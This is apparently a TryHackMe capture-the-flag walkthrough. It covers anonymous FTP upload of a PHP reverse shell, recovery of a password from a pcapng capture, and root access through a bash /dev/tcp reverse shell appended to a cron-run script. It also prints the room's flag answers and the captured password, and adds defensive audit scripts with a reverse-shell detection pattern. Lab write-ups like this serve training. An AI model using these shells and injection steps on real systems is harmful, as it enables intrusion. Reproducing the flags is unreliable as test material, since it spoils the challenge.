Abuse traditional vulnerabilities via untraditional means.
first, we scan with nmap
nmap -A -T4 10.10.86.86
we can see 3 open ports: ftp (21), ssh (22) and http (80)
the most notable one is ftp, which allows anonymous login
ftp 10.10.86.86
Name (10.10.86.86:admin): anonymous
Password:
you may get an error like this when the client tries to open the data connection
the solution is to turn passive mode on with the passive command
then download all files to local and exit
get .test.log
get ftp
get important.jpg
get notice.txt
nothing here
important.jpg
a quick look at the website
nothing much here either
scan directories with gobuster
gobuster dir -u http://10.10.86.86/ -w /usr/share/wordlists/dirb/common.txt -t 30
go to /files
it's the ftp directory exposed over http, so whatever we upload via ftp is served by the web server
prepare a php reverse shell and change the ip (and port, if needed) to your own
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
let's go back to ftp and upload our shell
cd ftp
put reverse.php
now we can see our shell listed here
create a listener, then open the file in the browser to trigger it
nc -vlnp 1234
python -c 'import pty;pty.spawn("/bin/bash")'   (upgrade to an interactive tty)
and the secret spicy soup recipe is love
let's see what's in the 2 suspicious folders here
hmm, a pcapng file, i'll copy it out to analyze locally
cp /incidents/suspicious.pcapng /var/www/html/files/ftp/
open the captured file with wireshark
wireshark -r ./Downloads/suspicious.pcapng
our concern should be the http protocol; i can see someone requested a web shell in the past
let's follow the tcp stream on port 4444 and dump it all out as plain text
after looking through it, i can see the password for lennie here
or you can use strings if you aren't familiar with wireshark, since the shell session was sent in cleartext
strings suspicious.pcapng
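as an added example (not part of the original writeup), this is the same triage step done in a script instead of wireshark or strings: a minimal pcapng parser that pulls the printable strings out of every tcp segment on a given port. it reads pcapng Enhanced Packet Blocks, walks Ethernet/IPv4/TCP headers, and applies a strings-style regex to the payload. the capture it runs on is constructed inline (the builder functions exist only to make that sample, and the ips, ports, macs and EXAMPLE_PASSWORD are placeholders).

```python
import re
import struct

# Block type constants from the pcapng specification.
SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006


def _block(endian, btype, body):
    # A pcapng block is: type, total length, body padded to 4 bytes, total length again.
    body += b"\x00" * ((-len(body)) % 4)
    total = 12 + len(body)
    return struct.pack(endian + "II", btype, total) + body + struct.pack(endian + "I", total)


def build_pcapng(frames, endian="<"):
    """Build a minimal pcapng file (SHB + one Ethernet IDB + one EPB per frame). Test data only."""
    shb = _block(endian, SHB, struct.pack(endian + "IHHq", 0x1A2B3C4D, 1, 0, -1))
    idb = _block(endian, IDB, struct.pack(endian + "HHI", 1, 0, 65535))  # linktype 1 = Ethernet
    epbs = b"".join(
        _block(endian, EPB, struct.pack(endian + "IIIII", 0, 0, 0, len(f), len(f)) + f)
        for f in frames
    )
    return shb + idb + epbs


def build_tcp_frame(src_ip, dst_ip, src_port, dst_port, payload):
    """Ethernet/IPv4/TCP frame with dummy MACs and zero checksums (enough for a parser test)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp + payload


def iter_frames(data):
    """Yield the captured bytes of every Enhanced Packet Block, honouring the file's byte order."""
    if data[:4] != b"\x0a\x0d\x0d\x0a":
        raise ValueError("not a pcapng file")
    endian = "<" if data[8:12] == b"\x4d\x3c\x2b\x1a" else ">"
    off = 0
    while off + 12 <= len(data):
        btype, blen = struct.unpack_from(endian + "II", data, off)
        if blen < 12 or off + blen > len(data):
            break
        if btype == EPB:
            caplen = struct.unpack_from(endian + "I", data, off + 20)[0]
            yield data[off + 28: off + 28 + caplen]
        off += blen


def tcp_payload(frame):
    """Return (src_port, dst_port, payload) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    ip_total = struct.unpack_from("!H", frame, 16)[0]
    tcp_off = 14 + ihl
    src, dst = struct.unpack_from("!HH", frame, tcp_off)
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return src, dst, frame[tcp_off + data_off: 14 + ip_total]


def printable_strings(blob, min_len=4):
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def strings_on_port(pcapng_bytes, port):
    """Printable strings from every TCP segment whose source or destination port matches."""
    out = []
    for frame in iter_frames(pcapng_bytes):
        parsed = tcp_payload(frame)
        if parsed and port in parsed[:2]:
            out.extend(printable_strings(parsed[2]))
    return out


# Constructed sample capture: one HTTP request and one cleartext shell session on port 4444.
SAMPLE_PCAPNG = build_pcapng([
    build_tcp_frame("10.8.0.74", "10.10.86.86", 50000, 80, b"GET /files/ HTTP/1.1\r\n\r\n"),
    build_tcp_frame("10.10.86.86", "10.8.0.74", 50001, 4444,
                    b"whoami\nsu lennie\nPassword: EXAMPLE_PASSWORD\n"),
])

if __name__ == "__main__":
    for s in strings_on_port(SAMPLE_PCAPNG, 4444):
        print(s)
```

the point for a defender is the same one the pcap makes: a reverse shell is an unencrypted tcp session, so anything typed into it (including a password for su) is recoverable by anyone holding a capture of the traffic. the parser only handles Ethernet/IPv4/TCP frames and ignores fragmentation and stream reassembly, which is fine for triage but not a replacement for wireshark's follow-stream.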
su lennie
c4ntg3t3n0ughsp1c3
flag here

| Flag | user.txt |
|---|---|
| Answer | THM{03ce3d619b80ccbfb3b7fc81e46c0e79} |
there is a scripts folder
a script in it runs with root permission (via a scheduled job), which is the key to privilege escalation
it in turn runs a file that lennie has write permission on, so we can append our own commands to it
create a reverse shell
echo "bash -i >& /dev/tcp/10.8.0.74/4444 0>&1" >> /etc/print.sh
open netcat and wait for it to call back
nc -vlnp 4444
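as an added example (not part of the original writeup), here is the check an administrator would run to catch the misconfiguration this step abuses: a script that root executes on a schedule but that a lower-privileged user can write to. the audit reports weak ownership, group/world write bits on the file or its directory, and any line that looks like an injected reverse shell (the bash /dev/tcp form used above, or nc -e). demo() recreates the condition in a temp dir with constructed data; the 192.0.2.10 address is a documentation placeholder.

```python
import os
import re
import stat
import tempfile

# Pattern for a bash reverse shell line (the form that appears in this writeup) and nc -e.
REVERSE_SHELL_RE = re.compile(r"/dev/(tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+|\bnc\b[^\n]*\s-e\s")


def audit_root_script(path, expected_uid=0):
    """Findings for a script that root executes on a schedule: weak ownership, write bits on the
    file or its directory, and lines that look like an injected reverse shell."""
    findings = []
    st = os.stat(path)
    if st.st_uid != expected_uid:
        findings.append(f"owner uid {st.st_uid} differs from expected uid {expected_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable without the sticky bit")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if REVERSE_SHELL_RE.search(line):
                findings.append(f"line {lineno}: reverse-shell indicator: {line.strip()}")
    return findings


def demo(inject=True, mode=0o777):
    """Recreate the writeup's condition in a temp dir (constructed data): a print.sh that root
    would run, with the given mode and optionally an appended reverse-shell line. Returns findings."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "print.sh")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write("#!/bin/bash\necho 'Done!'\n")
        if inject:
            # The injected line; 192.0.2.10 is a documentation address, not a real listener.
            fh.write("bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n")
    os.chmod(script, mode)
    # expected_uid is the current user because the temp file is owned by whoever runs this;
    # on a real host you would pass 0 and point it at the script the root cron job executes.
    return audit_root_script(script, expected_uid=os.getuid())


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

the fix on a real host is the mirror image of the findings: the script and its directory owned by root and mode 0755 or tighter, so the scheduled job can never execute something a non-root user was able to edit.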
flag here

| Flag | root.txt |
|---|---|
| Answer | THM{f963aaa6a430f210222158ae15c3d76d} |